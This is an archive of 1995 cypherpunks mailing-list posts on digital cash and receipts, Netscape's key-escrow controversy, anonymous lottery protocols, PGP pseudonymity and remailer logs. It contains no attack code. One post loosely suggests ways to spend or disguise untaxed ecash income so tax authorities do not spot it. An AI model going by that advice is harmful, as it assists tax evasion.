                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David A Wagner <daw@CS.Berkeley.EDU>
Date: Fri, 1 Dec 1995 15:31:15 +0800
To: cypherpunks@toad.com
Subject: digital receipts and cash
Message-ID: <199512010408.UAA04333@quito.CS.Berkeley.EDU>
MIME-Version: 1.0
Content-Type: text/plain


Digital cash protocols are starting to look like they could become very
popular and useful.

But under current proposals, there's one thing you don't get when you
spend digital cash: a digital receipt.

(Later, if the vendor reneges on the transaction, you'd have the digital
receipt to prove that you paid & the vendor is cheating you.)

This seems like it would be a really useful feature.  Does anyone know
if there are any *practical* protocols to do this?

ObCypherpunks relevance: digital receipts seem (IMHO) important to the
emergence of fair and robust reputation markets.  Discuss.

ObCrypto relevance: I've looked through _Applied Cryptography_, but the
protocols listed there aren't practical -- they require something like
100 rounds of interaction!  Can this be improved?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Mark Grant" <mark@unicorn.com>
Date: Fri, 1 Dec 1995 04:44:42 +0800
To: s1113645@tesla.cc.uottawa.ca
Subject: Re: Credit card theft Re: The future will be easy to use
Message-ID: <Pine.3.89.9511301809.A9289-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 30 Nov 1995 s1113645@tesla.cc.uottawa.ca wrote:

> What if it's an ecash password getting stolen? Who's liable? (lemme 
> guess, your money's gone, tough luck!)

>From what I remember of the contract, that's true, the bank appear to take
no liability for ecash (check the WWW page for the real details). As I'm
not likely to have more than about $ 50 of ecash at any time, I'm not
*that* concerned about it. Big users could transfer payments back into
their dollar account ASAP to avoid most of these problems, just keeping
enough in the ecash account to make any payments that may be required. 

It's not really any worse than physical cash, as long as the software is
reliable, which it appears to be (I've lost payments in the past, but 
cancelling them has always worked to get the money back).

> Disclaimer: I don't have a marktwain account at the moment, so I can't
> say a thing about the security of the system. I wish them the absolute best 
> of luck.

I do, and yes, from conversations with them it appears that if someone
gets your secret key and password they can clear out all the money from
your ecash account. This is potentially a real problem for shops, which
have to have a secret key file on the machine they run from. Currently
this even applies to shops that only *accept* ecash, though there may be
an accept-only server out sometime, and I found a way to delete the secret
key itself from the file and still have it work (I forget the exact
details, you basically zero 256 bytes of the file that contain the key,
which appears to be 768-bits according to the debug output, so I don't
know what the extra bits are used for). 

Shops that pay out need to have an *unencrypted* secret key on the server,
which is scary, but there's not much you can do about it if you're running
on an insecure server...  The only way around it that I can see would be
to withdraw ecash using a secure machine and upload it to your server, so
that the shop could make payments until the ecash supply was depleted and
then you'd manually have to withdraw more. Then if someone broke into your
account they'd get the ecash, but not the key, and you could limit your
exposure to the amount you uploaded at any one time. I'll probably be
doing that once the check I mailed over gets into my ecash account. 

This is strictly my understanding of the system based on what I've been
told, so hopefully if I'm wrong then someone from DigiCash will correct
me.

	Mark





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Fri, 1 Dec 1995 05:33:20 +0800
To: hallam@w3.org
Subject: Re: WTO an even worse possibility as Inet regulator
In-Reply-To: <9511301947.AA05400@zorch.w3.org>
Message-ID: <Pine.BSD.3.91.951130202218.7762O-100000@usr3.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 30 Nov 1995 hallam@w3.org wrote:

> 
> >  a very credible white paper is circulating for the WTO to establish an 
> >internet CZAR to regualate the Internet and level the playing field world 
> >wide. 
> 
> >   personally, the Feds and the FCC are bad enough --now they want to 
> >have a **global** bureaucracy play god  -???
> 
> 
> Depends on what the role of the Czar is. If it is to stop sillyness like 
> border disputes and keep national governments out of the loop then it
> could be a good thing. If they want to regulate it is a bad thing.
>
   	<attila>  

	1. unfortunately, the state intent is to regulate.

 	2. have you ever seen a bureaucracy that does not turn to 
           regulation one in has the power?  (unless they were asleep <G>)

> WTO is mainly known for the GATT which they brokered. This is basically
> an agreement amongst national governments to be "hands off" in their
> tariff regulations. 
> 
	<attila sez>  but WTO is also accumulating a rather larger 
    bureaucracy and is challeng Uncle Sam on severl major unilateral
    actions.  They will have the power of international courts which,
    today, the U.S.  can ignore, but at great international bad publicity
    in a time where he have few enough friends as it is --if the U.S.
    slips into the abyss which the incompetent beltway maggots have been
    building for 50 years, the US' current "friends" will be first in line
    to screw us over --and it will be by the WTOs and world courts, or the
    Rockefeller NWO --read UN, and UN troops in America. 

	As slippery and somewhat slimy as Gingrich is, so far he has been
    the only one to put his career on line admitting to the fact the
    current overstuffed bureaucracy *does not work* --now, if he could get
    a clue other than get the government out of your nose and really
    deliver (impossible given Clinton's retrenchment in Fair Deal
    idealism)....

> There is the potential for governments to regulate the Internet. It is
> in everyone's interest to keep hands off but if one starts to regulate
> then it is in others interests to regulate. The general soulution to
> prisoners dilema games is to form some type of alliance. It is not
> possible to form alliances in classical prisoners dilemas since they
> are restricted to a single dilema at a time. Givernments are involved
> with multiple dilemas and hence have multiple agreements. The main reason to
> keeo a treaty is that the credibility of government depends on keeping 
> treaties. Thus a treaty can solve a prisoners dilema problem since 
> the gain from breaking one treaty is more than offset by the potential loss
> through other sides abrogating other treaties.
> 
> 
> I suspect that the role of an Internet Czar would be mainly ensuring that 
> fat Internet pipes arrived throughout the third world. George Sorros has
> been very active in this area, he paid for much of the infrastructure
> development into Eastern Europe. If we could persuade Bill Gates that his 
> mission in life was to cable Africa to the Internet somehow we might have the
> whole planet online before 2000.
> 
> I would not be too worried about WTO banning crypto or attempting looney
> tune ideas like insisting on OSI protocols. The UN generally does some very 
> worthwhile work in allocating radio frequencies and such like and has done so 
> for many years without problems. They allocate areas of the clarke belt for 
> satelites and do all sorts of mundane tasks.
> 
> 
> One of the odd things about power is that the larger the scale the more mundane 
> the decisions. At the local level councillors decide to build or close schools 
> and hospitals. At the global level negotiations are held on the size of holes in 
> fishing nets and the exact specifications of ball bearings.
> 
> If people want to see the Federal government weakened in power the only way to 
> do so is to make it ceed power both upwards and downwards. A national speed 
> limit may be a bad idea (I personally think what was wrong was 55mph) but 
> national standard roadsigns is a good idea. International standard roadsigns are 
> a better idea still. 
> 
	<attila sez>  amen for international road signs --go metric! join 
    the living!  go 24 hour clocks and not be lost in the rest of the world!

        and, while we're at it, let's use universal time! yeah, right! 
    this one I can see.

> 
> 		Phill.
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Charles Lewton <clewton@netcom.com>
Date: Sat, 2 Dec 1995 01:41:46 +0800
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: Netscape gives in to key escrow
In-Reply-To: <199511301752.MAA06161@jekyll.piermont.com>
Message-ID: <Pine.SUN.3.91.951130205725.857B-100000@netcom12>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 30 Nov 1995, Perry E. Metzger wrote:

> 
> Jeff Weinstein writes:
> > sameer wrote:
> > > 
> > > http://www.cnet.com/Central/News/govt.html
> > > 
> > >         Bad. Very Bad. And I was almost starting to like Netscape.
> 
> Jeff, I'll be blunt.
> 
> I'm never going to use Netscape again if it turns out to be true. Sure

 --snip--	

> Tell him that if he is being misquoted he'd better make sure that 
> retractions get printed and fast.

 --snip--
 
> If you don't want "Netscape Inside" to be treated as a warning label,
> you guys will reject escrow as any other ethical company would -- or
> else.
> 
> Perry
> 

Perfectly put, Perry.  I have my store-bought copy of Netscape all
neatly wrapped and ready to send back to them, pending only their
timely response.

If I do not hear them denounce GAK, then away it goes.

Chuck




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Fri, 1 Dec 1995 14:04:23 +0800
To: graeme@chem2.chem.swin.edu.au>
Subject: Re: Netscape 2.0b2 allows for invasion of privacy (fwd)
In-Reply-To: <Pine.SGI.3.90.951201155131.15809A-100000@chem2.chem.swin.edu.au>
Message-ID: <Pine.ULT.3.91.951130212409.28316B-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


[As seen on the cypherpunks list]

I just confirmed this for Mozilla/2.0b3 (Win95; I). I also see an entry 
from the Mac version of 2.0b3. No need for anyone else to test it. 

Very nasty indeed. To what other variables might someone have access?

Scott is probably going to be responsible for a good bit of the traffic 
on the trans-pacific cables tomorrow :-)

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Frank Stuart <fstuart@vetmed.auburn.edu>
Date: Fri, 1 Dec 1995 12:36:30 +0800
To: cypherpunks@toad.com
Subject: Re: Getting a copy of the Jim Clark speech
Message-ID: <199512010343.VAA26254@snoopy.vetmed.auburn.edu>
MIME-Version: 1.0
Content-Type: text/plain


>If he has not clarified his position by tomorrow evening, I will set up some
>web pages explaining the situation and decrying Netscape's apparent
>position on key escrow (GAK). I have the quotes that L. McCarthy posted,
>and Jeff Weinstein's response. I have not been able to get the article off
>the server yet (possible all the cypherpunks downloading it?). Any other
>documents I should include?

I'm working on an "obnoxify" program to convert normal html documents into
documents that look normal to non-netscape browsers, but are too painful to
read with netscape (</BLINK>, <FONT SIZE=1>, etc.).  I think tomorrow evening
would be a good time to decide whether or not to distribute it.


                          | (Douglas) Hofstadter's Law:
Frank Stuart              | It always takes longer than you expect, even 
fstuart@vetmed.auburn.edu | when you take into account Hofstadter's Law.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Fri, 1 Dec 1995 12:47:27 +0800
To: holovacs@styx.ios.com (Jay Holovacs)
Subject: Re: Netscape gives in to key escrow
In-Reply-To: <Pine.3.89.9511300825.A27268-0100000@styx.ios.com>
Message-ID: <199512010307.WAA18467@homeport.org>
MIME-Version: 1.0
Content-Type: text


Jay Holovacs wrote:
| On Thu, 30 Nov 1995, Timothy C. May wrote:

| > Can Netscape continue to prosper? This latest issue won't kill it,
| 
| I suspect this will unfortunately help. Stockholders are interested in 
| profits, not principles. Co-oping with the feds will help Netscape get to 
| the commercial market sooner, and most customers, sadly don't give a damn 
| about privacy (or don't understand).

	Thats very true.  We should look at what stockholders tend to
care about (although, in the case of many internet stocks, it does
seem to be 'a bigger fool').

	One thing that stockholders do care about is liability.  Its
my (non lawyerly) opinion that anyone implementing GAK without a
government mandate to do so is opening themselves up to huge liability
the Clipper database of keys gets out.

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Fri, 1 Dec 1995 12:10:49 +0800
To: s1113645@tesla.cc.uottawa.ca
Subject: Re: ecash lottery (Was: ecash casino)
Message-ID: <01HY9QKW4BCS8WYZVM@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"s1113645@tesla.cc.uottawa.ca" 30-NOV-1995 00:22:29.15

Isn't there also some Scandinavian bank that's handling ecash? It might be
hard to explain to US tax authorities how large amounts of anon currency
are ending up in one's marktwain account. In that case it might be 
-------------------
	There are essentially two things that one can do with tax-suspicious
ecash (or cash, for that matter). The first is to expend it in non-traceable,
non-predictable ways. The second is to disguise it so it looks
non-tax-suspicious.
	The first includes spending, of course. In regards to the
non-predictible, I am meaning avoiding spending it for things such as groceries
that someone can easily estimate a minimum bound for how much can be spent.
Spending it to add quality (such as low-fat foods) to those groceries would be
harder to prove.
	The first also includes charity and investment. Investment does have
the problem that the income one gets out will have to then be treated by the
same sort of process.
	The second will vary in method depending on one's individual skills
and situation. However, I will note that it will be easier for those with
independent earning skills- a self-owned business, for instance.
	I will note in regards to the above that while I have been doing some
reading on the underground/black economy, I have not actually attempted any
of the maneuvers discussed. Thus, what I say should be taken with at least a
grain of salt.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Thu, 30 Nov 1995 19:37:34 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: ecash lottery (Was: ecash casino)
In-Reply-To: <ace2b2de0c021004c90a@[205.199.118.202]>
Message-ID: <199511301122.WAA23954@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello cypherpunks@toad.com
  and tcmay@got.net (Timothy C. May)

tcmay wrote:
> At 6:22 AM 11/30/95, Bill Frantz wrote:
> >At 20:38 11/29/95 -0800, Timothy C. May wrote:
> >>Have to be _very_ careful here. A variety of scams can be developed which
> >>show lots of "small" winners, but which fail to show any large winners. The
...
> My intuition (hand-waving) is that an anonymous lottery is possible, but I
> haven't looked at the details. Certainly multiple trusted holders of keys
...

I've read somewhere that it's possible to play poker over the telephone;
see comp.risks 17.19 and 17.21 (particularly the latter, though I haven't
followed the references so I can't speak of them).

...
> (escrow agents) would help make the lottery fair. Maybe bit commitment
> would help (each player buys the right to play, then "commits" his number.
...

How about every person commits a random number, then all reveal.
The winner is determined deterministically from all the numbers.

Does this make sense or is there some basic hole in it?

(
I have a tendency to be too brief to be comprehensible, so let me
rephrase it somewhat longer:

1. game is announced, players registered and numbered [1]..[n]
2. each player [i] chooses a random number [a_i] (secretly)
3. each player [i] publicly commits to [a_i]
4. wait for all players to commit
5. each player [i] publishes [a_i]
6. the winner is player [f(a_1,a_2,...,a_n)]

The function f doesn't need to be one way, but the output must depend on
all the inputs. (Sum modulo n sounds OK but I haven't thought it out.)
)

The fun bit in this game would be picking your number - of course
that reduces security, but I suspect that many people would prefer
to type in their lucky numbers themselves than having a computer
pick it for them... Or you could get the entropy from the mouse:
"it's all in the wrist".

You could probably almost code that in a shell script...


Obvious weakness is that the last player to do step 5 above knows
who the winner is before anyone else, and could presumably disappear.
The way to avoid this is a rule that when a player disappears the
money goes to charity. (A malicious last player could still prevent
you from winning, but at least without payoff. You could give it
negative payoff if you wanted.) If you wish to discuss this point,
Cc me at jiri@c031.aone.net.au - that's where my spreadsheet is.


Have I just made a complete fool of myself?

Jiri
- --
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBML2T0yxV6mvvBgf5AQEtGQP/VKUGrArDxG98iIiAtQ0zuErSjCsMJN+P
HJ8MROmbgPa5kstzLMRk6wjPSkxSuUtiLLVbTTV6Aghfi2Kh7mRa6D38j43hyImU
Z0V6V7gtCis/QzZ7KSTt5KKkDev672bbL17XYVWhMfvLABUG7L7kCbbKDGjUgUrL
yl4H+8Pxt1c=
=2nuk
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Fri, 1 Dec 1995 12:52:47 +0800
To: cypherpunks@toad.com
Subject: (fwd) ECheques
Message-ID: <v02120d4cace424453e03@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text

From: "John Hemming CEO MarketNet"  <JohnHemming@mkn.co.uk>
Date:  Thu, 30 Nov 1995 17:11:34 PM PST
To: www-buyinfo@allegra.att.com
Mime-Version: 1.0
Subject: ECheques

We have just had the final modifications of the documentation from our
Lawyers to make the UK Sterling Clearing ECheque system fully live.

If you want to peruse the process

http://mkn.co.uk/bank - about opening accounts
http://mkn.co.uk/help/bank/register - account contract
http://mkn.co.uk/help/bank/regkey - registering each key mandate

We do intend putting some form of PGP signature checking facility
in for clearing ECheques later, but for the moment the standard ECheque
form generated by WorkHorse is what we accept.

The Standard ECheque is nothing more than a BER encoded sequence
similar to a certificate request with a standard PKCS signature at the end
of it which is then Base64 encoded (but if you use the decoding
facilities in WorkHorse you can see this).

Britain .... first again.

We did clear an ECheque in September, but this is now the real McCoy.
Merchant accounts cost nothing to open and the transactional charge
for a Merchant to receive Sterling (not ecash denominated in Sterling)
is 1%.  The accounts can be reviewed online and they are real bank
accounts (in Sterling however).  Other Merchant transactions are costed
as usual see conditions (eg 40p per cheque - paper cheque).

If you want to integrate ECheques and the web simply see our flower
ordering form http://mkn.co.uk/load/ordflow

John
--- end forwarded text


-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The NEW(!) e$ Home Page: http://thumper.vmeng.com/pub/rah/
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Fri, 1 Dec 1995 12:29:13 +0800
To: loki@obscura.com
Subject: Re: Getting a copy of the Jim Clark speech
Message-ID: <01HY9R3NKBII8WYZVM@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"loki@obscura.com" 30-NOV-1995 21:12:15.86

If he has not clarified his position by tomorrow evening, I will set up some
web pages explaining the situation and decrying Netscape's apparent
position on key escrow (GAK). I have the quotes that L. McCarthy posted,
and Jeff Weinstein's response. I have not been able to get the article off
the server yet (possible all the cypherpunks downloading it?). Any other
documents I should include?
---------
	I would suggest being sure to include some links to the EFF archives
in regards to Clipper, etcetera. These should make it clear that it isn't just
one group opposing the idea of GAK, but a wide coalition.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Fri, 1 Dec 1995 15:27:54 +0800
To: adam@lighthouse.homeport.org
Subject: Re: Medical Records
Message-ID: <01HY9R839B8G8WYZVM@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"adam@homeport.org"  "Adam Shostack" 29-NOV-1995 14:05:58.31

	It seems that they use signatures & hashes; nice work, a good
advance for medical records storage, but I'd ask how keys are managed,
and also what prevents me exploiting the 'hash-only' mode of sending
in what I'm cliaming to be is an emergency.  (Not that these
invalidate the system; they're just interesting areas to work on.)
----------------------
	Good questions. I would encourage anyone in San Fransisco to go by
and talk to them (or, of course, if anyone can find the researcher's email
address, that would be excellent).
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: KJC@cityscape.co.uk (KJC)
Date: Fri, 1 Dec 1995 07:34:38 +0800
To: cypherpunks@toad.com
Subject: Re: GAKzilla & British MPs
Message-ID: <199511302239.WAA16631@ns.cityscape.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


>
>
>On Thu, 30 Nov 1995, KJC wrote:
>
>> for ages - I give up!.- BTW- after 'Britland' MPs posted hear a while back
>
>Interesting, that must have been during one of my sanity vacations from the 
>list. Do you remember approx. when or maybe what their names were?
>Might make it easier to hunt it down in the archives.
>Thanks.
>
>You know it's really strange, the only people around here I've found 
>interested in crypto and aware of sci.crypt and this list were government 
>spooks. I even sold my 1st edition Applied Crypto to one.
>Friendly people, but totally discouraging.
>
>> I thought _maybe_ we'd hear more.Will the last one to leave Grate Britain
>> please switch out the lights!
>> kc
>At least you have better weather. 
>
>
I think it was around March '95. Adam Back(?) cross-posted an email
from sci.crypt (written by Chris Smith and concerning Cambridge(U.K.)
MP Anne Campbell).At some point Campbell posted to the list herself(?)
Sorry,I'm not very clear on this but for some reason I always thought
she wasn't the only MP involved. Yadayadayada... they're a bit like London buses-
nothing for hours then 3 or 4 arrive at the same time...
I've posted this to the list 'cause maybe someone can update the story...
I'd _still_ like to know if there has been any discussion(by MPs) since then 
Sorry about the bandwidth 
kc
p.s. Weather better now its been sold to the French.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Sun, 3 Dec 1995 00:25:10 +0800
To: cypherpunks@toad.com
Subject: Re: "Got a subpoena?"
Message-ID: <2.2b7.32.19951201064716.008989b0@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:50 AM 11/30/95 -0500, you wrote:

>To use the most obvious example, different remailer operators turn
>different levels of logging on.  So one operator will say "Yes, I am
>obligated to fully comply with your subpoena, officer.  Here are the
>full logs for the last six months."  And another will say "Yes, I am
>obligated to fully comply with your subpoena, officer.  However, I
>keep no logs at all of the mail sent through my remailer.  Drag, huh?"

Sounds like we need a version of Mixmaster for the logs...

| Its Log! Its Log! Its big, its heavy, its erased| alano@teleport.com   |
|"The moral PGP Diffie taught Zimmerman unites all| Disclaimer:          |
| mankind free in one-key-steganography-privacy!" | Ignore the man       |
|`finger -l alano@teleport.com` for PGP 2.6.2 key |  behind the keyboard.|
|         http://www.teleport.com/~alano/         |       <fnord>        |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Thu, 30 Nov 1995 20:05:57 +0800
To: jimbell@pacifier.com (jim bell)
Subject: Re: key for Alice as promised (not)
In-Reply-To: <m0tKuh9-0008zjC@pacifier.com>
Message-ID: <199511301156.WAA24082@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello Jon Lasser <jlasser@rwd.goucher.edu>
  and jimbell@pacifier.com (jim bell)
  and cypherpunks@toad.com

jim bell wrote:
> >On Tue, 28 Nov 1995, Adam Hupp wrote:
...

One reason why Alice might not want to use PGP would be that posession
of the secret key would be ipso facto evidence that he is Alice.

...
> spoofed, HE WILL KNOW because he will see a message with his signature that
> HE KNOWS he didn't send.  At that point, he will at least be able to reduce
> the number of spoofed messages to 1 before he alerts us that there is a
> problem.  We won't necessarily know who to believe, of course, but we will
...

Who to believe: at that stage, Alice will simply cease to exist.
The key will be revoked and Alice will be no more. A new Alice may
or may not arise, but no-one will know if it's the same one.

If Alice is afraid of loss of identity (as if he had one now),
he could have a permanent key at home (where he does his OTP work),
and on his e-mail machine have only a temporary key. When the key
on the public machine is compromised, it is revoked and a new one
is issued.

(The same can be done with real-name keys, BTW; viz my own key.)

...
> 3.  Somebody found out how to break 1024-bit PGP keys easily.  (Very
> unlikely, of course.)
...

In this case I think we are all stuffed.


Adiau'

Jiri
- --
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBML2cAyxV6mvvBgf5AQFU7wP/ap/HA2SzMfRoM+5Rihw+j9RHC7aZNCtq
ZcUbXJRVXA2iDZfTE/vd5NgYDxEflyb9FwcGd8MZ8s0pxmee/iqEx3YXI0M2b7gL
HOex526hifweAQmaPoSQLWqiN4XVZ51XVBvKOJos/9eOX9FAZDRQZd6KFBaSqIcc
ZpzQ54NLm0g=
=BLPi
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jmhayes@netcom.com (Jordan Hayes)
Date: Sun, 3 Dec 1995 00:23:33 +0800
To: cypherpunks@toad.com
Subject: A challenge ...
Message-ID: <199512010735.XAA04851@netcom14.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


I've been challenged to try to find a bank account; I win the challenge
if I can wire in $100 to the hidden account.  Anyone have any good
ideas about how to find an ABA number?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Fri, 1 Dec 1995 07:43:30 +0800
To: iang@cs.berkeley.edu
Subject: Re: ecash lottery (Was: ecash casino)
In-Reply-To: <199511300621.WAA26406@netcom14.netcom.com>
Message-ID: <9511302253.AA04389@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain


'small' questions about inet gambling

+ How do you complain that you didn't got your win without revealing
your ID ?
+ Alternatively, How do you prevent false complains or nasty
concurrent trying to trash gambling co reputation ?

regards
ps: it would be easier that the game is legal so ppl can play without
being hidden... In my current casino, most people do complain when
there is a problem, and I think that those who don't aren't because
its monopoly money or just they aren't paying much attention...

dl
--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept

jihad Ortega Qaddafi Legion of Doom South Africa KGB Uzi




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Fri, 1 Dec 1995 08:13:13 +0800
To: cypherpunks@toad.com
Subject: nonetest
Message-ID: <199511302254.XAA09438@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


12890 87221 56907 00458 94225
40838 75693 98239 87802 85834
98347 49857 21349 12038 14896
09343 87458 98589 32759 74545







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Giulio" <gexing@mbox.vol.it>
Date: Wed, 20 Nov 1996 14:19:57 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: No Subject
Message-ID: <199611202219.OAA21780@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Unsuscribe Cypherpunks Giulio <gexing@mbox.vol.it>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Tue, 31 Oct 95 18:35:18 PST
To: cypherpunks@toad.com
Subject: "Dr." Fred
Message-ID: <199511010235.DAA00908@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


The most charitable explanation for "Dr." Fred is that
he's degenerated into the professional equivalent of
those pathetic aging former chess masters who try to
eek out a subsistence living by charging five bucks a
game. People often play with them out of sympathy, or
for the novelty of having lost to a past great. It's
part of the chess culture, and it's basically harmless
and sort of quaint.

The difference, of course, is that its almost impossible
to have sympathy for Dr. Fred. His hustle is for a hell
of a lot more than subsistence. He was also never actually
a master of his field, a fact that becomes increasingly
obvious as our exposure to him goes on. Now he's reduced
himself to trying to collect someone else's winnings.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 1 Nov 95 08:51:42 PST
To: cypherpunks@toad.com
Subject: Re: IBM's Microkernal
In-Reply-To: <199511010122.CAA29490@utopia.hacktic.nl>
Message-ID: <199511011651.LAA02027@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain




Mr. Anonymous:
Why is this being sent to cypherpunks? Its totally irrelevant.

.pm

Anonymous writes:
> The Wall Street Journal, October 31, 1995, p. B6. 
> 
> 
> IBM Announces New Software Code That Is Universal
> 
> By Laurie Hays
> 
> 
> International Business Machines Corp., in its effort to reduce
> the importance of computer-operating systems, announced a new
> kind of universal-software code called Microkernal that
> enables software to work on incompatible hardware.
> 
> For software developers and businesses that want to develop
> one set of codes to run applications on many different
> machines, Microkernal offers an opportunity for the
> long-touted open computing. A big challenge remains, however:
> to market the technology and make a business case for software
> developers to write for Microkernal in a world that is
> dominated by Intel Corp. and Microsoft Corp.
> 
> "It's exciting technology, but it will be hard for them to
> market," says Dan Kuznetsky, an analyst with International
> Data Corp., a Framingham, Mass., market-research firm. "It's
> also got a long way to go from what they've announced to the
> future."
> 
> Mr. Kuznetsky likens the technology to the development of a
> great automobile transmission that has yet to be turned into
> a truck or a car.
> 
> The key to Microkernal is a single source code base that
> communicates between the hardware and the operating system.
> One long-term possibility, for example, would be to make the
> Apple Computer Inc.'s Maclntosh operating system work on an
> Intel PC, impossible today because the two have different
> design architectures that don't talk to each other.
> 
> IBM's delayed OS/2 operating system for the PowerPC chip,
> which is expected to be shipped by the end of the year, will
> be the first IBM offering for the Microkernal allowing
> developers to move applications to the chip with only small
> changes.
> 
> IBM so far has garnered a number of licensing agreements for
> Microkernal, including Digital Equipment Corp., Maynard,
> Mass., and LG Electronics, formerly the Korean electronics
> concern Goldstar, as well as a number of universities.
> 
> -----
> 
> 
> 
> 
> 
> 
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ncra@ix.netcom.com (NCRA )
Date: Wed, 1 Nov 95 13:31:34 PST
To: cypherpunks@toad.com
Subject: SCO Unix Crontab Problems-Need Help
Message-ID: <199511012132.NAA20695@ix2.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


I have a bourne shell that I need to execute in SCO unix 4.0 from a 
crontab.  The script is a communications upload using ecu.  The script 
runs just fine in terminal mode, but when it is executed in cron, it is 
not able to gain access of the modem for some reason.  

Q:  Is there something special that needs to be added to the crontab 
line in order to allow for tty access.  

Please let me know if you have any suggestions.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ljo@ausys.se (Johansson Lars)
Date: Wed, 1 Nov 95 05:31:17 PST
To: hfinney@shell.portal.com
Subject: RE: (cpx) Digicash tagged with payee?
Message-ID: <95Nov1.143001gmt+0100.53766@void.ausys.se>
MIME-Version: 1.0
Content-Type: text/plain




Hal Finney <hfinney@shell.portal.com> writes:

>I have heard it claimed that when you make a payment with Digicash ecash,
>the identity of the payee is encoded or embedded into the cash somehow.
>This is an anti-theft measure (among other things, perhaps).  The bank
>checks that the embedded identity in deposited cash matches the account
>name which is doing the deposit.

Where have you heard that? Everything I've heard from DigiCash seems
to indicate that no such "payee encoding" is performed.

>My question is, how could this be done?  How can the payor, at payment
>time, without communicating with the bank, embed a payee name
>irreversibly into the cash so that a thief cannot strip it out and
>replace it with his own name?

It is possible though with other (teoretical) protocols, such as Chaum,
Fiat and Naor's off-line cash scheme (briefly described in Schneirer's
book 'Applied Cryptography') and especially the (off-line) cash system,
developed by Stefan Brands.

In these systems, when Alice spends a coin at Bob's shop she has to
